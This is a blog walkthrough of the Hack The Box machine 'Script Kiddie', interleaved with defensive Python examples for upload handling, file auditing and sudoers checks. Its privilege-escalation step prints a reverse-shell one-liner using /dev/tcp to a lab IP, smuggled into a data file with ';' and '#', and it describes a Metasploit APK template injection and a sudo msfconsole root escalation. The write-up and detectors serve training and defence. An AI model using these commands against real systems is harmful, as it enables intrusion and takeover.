Script Kiddie : Hack The Box Walk Through

Vikas Sharma
Feb 11, 2021

Recently HTB released a machine named Script Kiddie. Yes!! Script Kiddie, which definitely gives a hint about the machine: we can assume we won't be doing much beyond relying on existing tools. Guess that's what Script Kiddie means!!

So let's see how easy this machine could be.

Concepts Learnt:

  1. Enumeration
  2. Malicious payload (template bin)
  3. Reverse Shell
  4. Privilege escalation

Port Scanning

First things first, scanning the machine to find the open ports!

Command: nmap -A -T4 10.10.10.226

Concluding that we have ports 22 and 5000 open. Port 22 is SSH and port 5000 is HTTP!

Enumeration

Let's see what we have on port 5000 (HTTP), so we visit the IP address with the port number.

Visit: 10.10.10.226:5000/ (in any browser)

By observing the web page, guess we have a lot to try for exploits like Command Injection, RFI, LFI, File Upload Vulnerability etc.

After trying all the options, we got a reverse shell using a File Upload Vulnerability leading to command injection. Let's see how it is done.

Malicious Payload Creation:

So we have the option of uploading a template file for creating a payload.

Searching Google for exploits of the template file option, we found the Rapid7 APK Template Command Injection.

Guess we are lucky here: we have APK template command injection and the option to upload an APK on the website. So we create the payload and upload the malicious file to get a reverse shell!
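The weakness this box exploits is the general pattern of a web application handing an uploaded file (and its client-chosen name) to a command-line tool through a shell string. The following is an added example, not code from the box or from Rapid7, showing the risky string-building form next to the hardened form: validate the client name against a strict allowlist, then discard it and store the file under a server-generated name, and invoke the tool with an argv list so no shell ever parses the path. "payload-tool" is a placeholder name for whatever builder the server wraps; the hostile file name and the upload bytes are constructed for the demo.

```python
import hashlib
import re
import shlex
import tempfile
from pathlib import Path

# Constructed allowlist for a template file name: starts with a letter or digit, then
# letters, digits, dot, dash or underscore, ends in .apk. No path separators, no spaces,
# no shell metacharacters.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}\.apk$")


def vulnerable_command(uploaded_name: str, payload_dir: str = "/tmp/payloads") -> str:
    """The risky pattern: the client-controlled name is spliced into one shell string.
    A name containing ';' becomes an extra command once the string is run with a shell.
    This function only builds the string so the problem is visible; nothing runs it."""
    return f"payload-tool -x {payload_dir}/{uploaded_name} -o {payload_dir}/out.apk"


def store_upload(original_name: str, content: bytes, upload_dir: Path) -> Path:
    """Validate the client-supplied name, then discard it: the file is stored under a
    server-generated name derived from its content hash, so nothing the client typed
    ever reaches a command line."""
    if not SAFE_NAME.fullmatch(original_name):
        raise ValueError(f"rejected template name: {original_name!r}")
    digest = hashlib.sha256(content).hexdigest()[:16]
    dest = upload_dir / f"{digest}.apk"
    dest.write_bytes(content)
    return dest


def build_argv(template: Path, output: Path) -> list:
    """Argv form: each element is one argument, no shell parsing happens, so any
    metacharacter in a path is just a byte in a file name ("payload-tool" is a placeholder)."""
    return ["payload-tool", "-x", str(template), "-o", str(output)]


def demo(tmp_dir: str = "") -> dict:
    """Run both forms against a constructed hostile name and a benign one."""
    upload_dir = Path(tmp_dir or tempfile.mkdtemp())
    upload_dir.mkdir(parents=True, exist_ok=True)
    hostile = "a.apk; id #"  # constructed hostile file name; it is never executed here
    fake_apk = b"PK\x03\x04fake-template"  # constructed upload bytes
    results = {"hostile_string": vulnerable_command(hostile)}
    try:
        store_upload(hostile, fake_apk, upload_dir)
        results["hostile_rejected"] = False
    except ValueError:
        results["hostile_rejected"] = True
    stored = store_upload("template.apk", fake_apk, upload_dir)
    argv = build_argv(stored, upload_dir / "out.apk")
    results["stored_name"] = stored.name
    results["argv"] = argv
    results["argv_as_logged"] = shlex.join(argv)  # safe, quoted form for audit logs
    return results


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The point of the content-hash name is that even a name which passes the allowlist never reaches the tool; the allowlist is a second layer, not the only one.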

Using Metasploit (msfconsole), we follow these steps:

FYI: this includes setting LHOST, LPORT, RHOST and RPORT as shown below:

Once those are set, the only thing left is to press the Fire button!! I mean, exploit…

So our malicious payload is ready. Give the APK file executable permission so everything goes smoothly. (The location of the file may differ from system to system.)

Now we upload the file to get the reverse shell. But first we need a listener; netcat listening on the port assigned to LPORT will do.

All set!! Let's upload the file and see what happens!!

Change the options accordingly, I mean LHOST.

Boom Boom!! We got a reverse shell…

Upgrading it into an interactive shell using the Python pty module:

Command used: python3 -c "import pty;pty.spawn('/bin/bash')"

Exploring the system, we complete our first checkpoint, i.e. the user flag.

One more thing that caught my attention: we don't have enough permissions, and there is another account named pwn on the machine.

There are scripts and files on the machine that we cannot access due to lack of privileges.

Privilege Escalation

Escalating to a user with higher privileges, i.e. pwn.

While exploring the system, I happened to encounter a file named hackers. What caught my attention about the file was its group owner, i.e. pwn.

So we could get a reverse shell by having a command placed in that file executed.

Here is the link we could use: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

Now we just have to adapt the reverse shell code so that it can be stored in the file.

Thus the command used:

echo " ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.30/1234 0>&1' #" >> hackers

Here 10.10.14.30 is the host IP and 1234 is the port on which the listener will be listening.

Before this, let's start the listener again on port 1234.

Now execute the command.

We have successfully got a reverse shell as the pwn user!!
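What made this step work is a data file that one user can write and that a script running as another user later reads and executes. The following added example (not code from the box) is the defender's view of that shape: a permission check on the file's mode bits combined with a content scan for the pieces of the one-liner above (a /dev/tcp redirection, "bash -i", a leading separator and a trailing comment). The demo builds a constructed copy of the hackers file in a temporary directory; the entries and the date in it are made up.

```python
import os
import re
import stat
import tempfile
from pathlib import Path

# Constructed indicator patterns for shell content smuggled into a data file. They match
# the pieces of the appended line used above: the /dev/tcp redirection, "bash -i", the
# leading ';' that ends whatever the script puts before it, and the '#' that comments
# out whatever follows.
INDICATORS = {
    "dev_tcp_redirect": re.compile(r"/dev/(tcp|udp)/\d{1,3}(\.\d{1,3}){3}/\d+"),
    "interactive_bash": re.compile(r"\bbash\s+-i\b"),
    "leading_separator": re.compile(r"^\s*;|\s;\s*/bin/"),
    "trailing_comment": re.compile(r"#\s*$"),
}


def scan_line(line: str) -> list:
    """Return the names of every indicator that matches one line of a data file."""
    return [name for name, rx in INDICATORS.items() if rx.search(line)]


def mode_is_writable_by_others(mode: int) -> dict:
    """Pure check on a stat mode: who besides the owner may write the file."""
    return {
        "group": bool(mode & stat.S_IWGRP),
        "world": bool(mode & stat.S_IWOTH),
    }


def audit_file(path: Path) -> dict:
    """Combine the permission check with the content scan for one file. A data file that
    is group- or world-writable and is consumed by a script running as another user is
    the risky shape; matching content inside it is evidence something was appended."""
    writers = mode_is_writable_by_others(path.stat().st_mode)
    hits = {}
    for n, line in enumerate(path.read_text(errors="replace").splitlines(), 1):
        found = scan_line(line)
        if found:
            hits[n] = found
    return {
        "path": str(path),
        "writable_by": writers,
        "suspicious_lines": hits,
        "risky": (writers["group"] or writers["world"]) and bool(hits),
    }


def demo() -> dict:
    """Build a constructed 'hackers' file in a temp dir: group-writable (mode 664), two
    ordinary entries, then the reverse-shell line from above appended."""
    d = Path(tempfile.mkdtemp())
    f = d / "hackers"
    f.write_text(
        "203.0.113.5 user1 2021-02-11\n"      # constructed ordinary entry
        "198.51.100.7 user2 2021-02-11\n"     # constructed ordinary entry
        " ;/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.30/1234 0>&1' #\n"
    )
    os.chmod(f, 0o664)
    return audit_file(f)


if __name__ == "__main__":
    print(demo())
```

Running the same audit over every file a cron job or a privileged script reads is the practical use; the fix on the box side is simply to stop the file being writable by the group that the low-privileged user belongs to.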

Since we now have the higher-privileged user, let's run the script we weren't able to before, i.e. scanlosers.sh.

Huh!! We got nothing!

Let's check for sudo (binary) vulnerabilities.

Command used: sudo -l

Ohh nice!! We can run metasploit as sudo with no password!!

Running Metasploit with sudo privileges:

FYI: the Metasploit console, i.e. msfconsole, can run a bash shell from the terminal.

Let's check whether it works here:

Yeah!! Moving forward to check whether Metasploit has started with root privileges.

Ohh!! This was expected. Since we have got everything, let's move to the root directory in the Metasploit shell and complete our second checkpoint, i.e. the root hash.
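The root step hinges on one sudoers rule: a NOPASSWD entry for a program that can spawn a shell. The following is an added example, not code from the box, of an audit that parses either sudoers lines or `sudo -l` output and flags NOPASSWD commands that hand the caller a shell. The msfconsole path in the samples is a constructed placeholder (the walkthrough does not show the real one), the other sample rules are made up, and the list of shell-capable programs is illustrative rather than exhaustive. Note the sudoers tag semantics it implements: a tag such as NOPASSWD: applies to the command it precedes and to every later command in the same list until another tag overrides it.

```python
import re
from typing import Iterable, Optional

# Constructed, illustrative set of programs that give the caller an interactive shell once
# running. msfconsole is the one found on this box; the others are well-known equivalents.
SHELL_CAPABLE = {"msfconsole", "bash", "sh", "zsh", "python", "python3", "perl",
                 "vim", "vi", "less", "more", "find", "awk", "env"}

# sudoers rule:  who  host = (runas)  [tag:] cmd, [tag:] cmd ...
SUDOERS_RULE = re.compile(
    r"^\s*(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<rest>.*)$")
# `sudo -l` entry:  (runas) [tag:] cmd, ...
SUDO_L_ENTRY = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<rest>.*)$")
TAG = re.compile(r"^(NOPASSWD|PASSWD|SETENV|NOSETENV|NOEXEC|EXEC):\s*")


def parse_commands(rest: str) -> list:
    """Split a command list and apply tag semantics: NOPASSWD: sticks to every following
    command until a PASSWD: tag resets it."""
    commands, nopasswd = [], False
    for entry in rest.split(","):
        entry = entry.strip()
        while (t := TAG.match(entry)):
            if t.group(1) == "NOPASSWD":
                nopasswd = True
            elif t.group(1) == "PASSWD":
                nopasswd = False
            entry = entry[t.end():]
        if entry:
            commands.append({"command": entry, "nopasswd": nopasswd})
    return commands


def parse_line(line: str) -> Optional[dict]:
    """Accept either a sudoers file line or one entry from `sudo -l` output."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#") or stripped.startswith("Defaults"):
        return None
    m = SUDO_L_ENTRY.match(line)
    if m:
        return {"who": "current user", "runas": m.group("runas").strip() or "root",
                "commands": parse_commands(m.group("rest"))}
    m = SUDOERS_RULE.match(line)
    if not m:
        return None
    return {"who": m.group("who"), "runas": (m.group("runas") or "root").strip() or "root",
            "commands": parse_commands(m.group("rest"))}


def audit(lines: Iterable[str]) -> list:
    """Flag NOPASSWD commands that are ALL or a shell-capable program."""
    findings = []
    for line in lines:
        rule = parse_line(line)
        if not rule:
            continue
        for c in rule["commands"]:
            base = c["command"].split()[0].rsplit("/", 1)[-1]
            if c["nopasswd"] and (c["command"] == "ALL" or base in SHELL_CAPABLE):
                findings.append({"who": rule["who"], "runas": rule["runas"],
                                 "command": c["command"],
                                 "reason": "NOPASSWD on a command that can spawn a shell"})
    return findings


# Constructed `sudo -l` output in the shape seen on the box; the msfconsole path is a placeholder.
SAMPLE_SUDO_L = """\
Matching Defaults entries for pwn on scriptkiddie:
    env_reset, mail_badpass

User pwn may run the following commands on scriptkiddie:
    (root) NOPASSWD: /opt/metasploit-framework/msfconsole
"""

# Constructed sudoers lines: only the last one should be flagged.
SAMPLE_SUDOERS = [
    "Defaults env_reset",
    "root ALL=(ALL:ALL) ALL",
    "%admin ALL=(ALL) /usr/bin/systemctl restart nginx, NOPASSWD: /bin/ls /var/log",
    "pwn ALL=(root) NOPASSWD: /opt/metasploit-framework/msfconsole",
]


if __name__ == "__main__":
    for f in audit(SAMPLE_SUDO_L.splitlines()) + audit(SAMPLE_SUDOERS):
        print(f)
```

The mitigation on the box side is the usual one: do not grant NOPASSWD on anything that can drop to a shell, and prefer a wrapper that exposes only the needed action.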

Finally pwned the user and root of Script Kiddie. It was kind of easy though!

For more blogs and updates stay tuned!
